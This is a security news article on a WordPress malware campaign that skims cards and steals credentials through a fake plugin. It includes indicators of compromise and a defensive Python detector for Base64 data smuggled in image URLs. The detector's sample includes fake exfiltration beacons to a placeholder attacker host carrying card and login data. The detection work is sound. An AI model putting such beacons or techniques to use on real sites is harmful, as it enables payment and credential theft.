Source: www.infosecurity-magazine.com
A newly discovered malware campaign with highly sophisticated capabilities, including credit card skimming, credential theft and user profiling, has been identified by cybersecurity researchers.
According to the Wordfence Threat Intelligence Team, the malware, found on May 16, 2025, was packaged as a rogue WordPress plugin and used novel anti-detection techniques, including a live backend system hosted on the infected websites themselves.
This method was not previously seen in WordPress-focused attacks.
Long-Running Operation with Evolving Tactics
The campaign appears to have been active since at least September 2023. Wordfence said it analyzed over 20 malware samples and found shared features across all variants, including obfuscation, anti-analysis techniques, developer tool detection and targeted execution.
For example, the malware avoids running on admin pages and instead activates only on checkout screens, sometimes checking for prior infections to avoid re-targeting the same users.
The most recent versions even included custom HTML overlays, fake payment forms and localized human verification challenges mimicking Cloudflare pages.
In many cases, stolen data was exfiltrated via Base64-encoded strings disguised as image URLs.
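The exfiltration pattern just described, Base64 payloads disguised as image URLs, is something a defender can scan for in saved page output or proxy logs. The following Python example is added here and is not the article's or Wordfence's code; it flags image URLs whose file stem or query value decodes to form-like data, using constructed sample HTML with a placeholder domain (exfil.example) and a well-known test card number.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qsl

# Image URLs in page output; the file stem and any query values are the Base64 candidates.
IMAGE_URL = re.compile(r"""https?://[^\s"'<>]+?\.(?:png|jpe?g|gif|webp)(?:\?[^\s"'<>]*)?""")

def decode_b64(token):
    """Decode standard or URL-safe Base64 (padding optional); return text only if printable ASCII."""
    if len(token) < 16:  # too short to carry anything, and avoids flagging normal file stems
        return None
    padded = token + "=" * (-len(token) % 4)
    for altchars in (None, b"-_"):
        try:
            raw = base64.b64decode(padded, altchars=altchars, validate=True)
        except ValueError:  # binascii.Error is a ValueError: wrong alphabet or length
            continue
        if raw and all(32 <= b < 127 for b in raw):
            return raw.decode("ascii")
    return None

def luhn_ok(digits):
    """Luhn checksum: separates a plausible card number from an arbitrary digit run."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch) * (2 if i % 2 else 1)
        total += d - 9 if d > 9 else d
    return total % 10 == 0

def looks_like_form_data(text):
    """Key=value pairs or a Luhn-valid 13-19 digit run suggest skimmed checkout input."""
    pan = re.search(r"\d{13,19}", text)
    return ("=" in text and "&" in text) or bool(pan and luhn_ok(pan.group()))

def find_exfil_urls(html):
    """Return (url, decoded payload) for image URLs hiding Base64 data in the stem or a query value."""
    hits = []
    for url in IMAGE_URL.findall(html):
        parts = urlsplit(url)
        stem = parts.path.rsplit("/", 1)[-1].rsplit(".", 1)[0]
        for token in [stem] + [v for _, v in parse_qsl(parts.query, keep_blank_values=True)]:
            decoded = decode_b64(token)
            if decoded and looks_like_form_data(decoded):
                hits.append((url, decoded))
                break
    return hits

def _enc(s):  # only used to build the constructed sample below
    return base64.urlsafe_b64encode(s.encode()).decode()

# Constructed sample page output: one benign image and two fake beacons on a placeholder domain.
SAMPLE_HTML = f"""
<img src="https://cdn.example.net/static/logo.png">
<img src="https://exfil.example/img/{_enc('cc=4111111111111111&exp=12/27&cvv=123')}.gif">
<img src="https://exfil.example/t.png?d={_enc('email=alice@example.org&pass=hunter2').rstrip('=')}">
"""
```

Run `find_exfil_urls` over a saved copy of a checkout page or over response bodies from a proxy capture; benign image references decode to nothing and are skipped.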
Malware Family Functions as a Modular Framework
This malware campaign was not limited to skimming. Researchers uncovered three additional variants with distinct objectives.
One variant manipulated Google Ads to serve fraudulent ads to mobile users, and another stole WordPress credentials. Meanwhile, a third distributed additional malware via link replacement. In all cases, the core framework remained consistent, with functionality adapted for each use case.
Some versions also used Telegram for real-time exfiltration and user action tracking.
Rogue Plugin Used as Malware Host
One of the most notable findings was a fake WordPress plugin named “WordPress Core.” While appearing legitimate on the surface, its components included JavaScript skimmers and PHP scripts that enabled attackers to manage stolen data directly from the infected website.
The plugin used WooCommerce hooks to mark fraudulent orders as completed, thereby delaying detection. Its backend infrastructure included a custom post type called “messages” that stored stolen payment data within WordPress itself.
Indicators of compromise (IoCs) include domain names such as api-service-188910982.website, graphiccloudcontent.com and api.telegram.org/bot[…]chat_id=-4672047987.
Original Post URL: https://www.infosecurity-magazine.com/news/rogue-wordpress-plugin-skim-credit/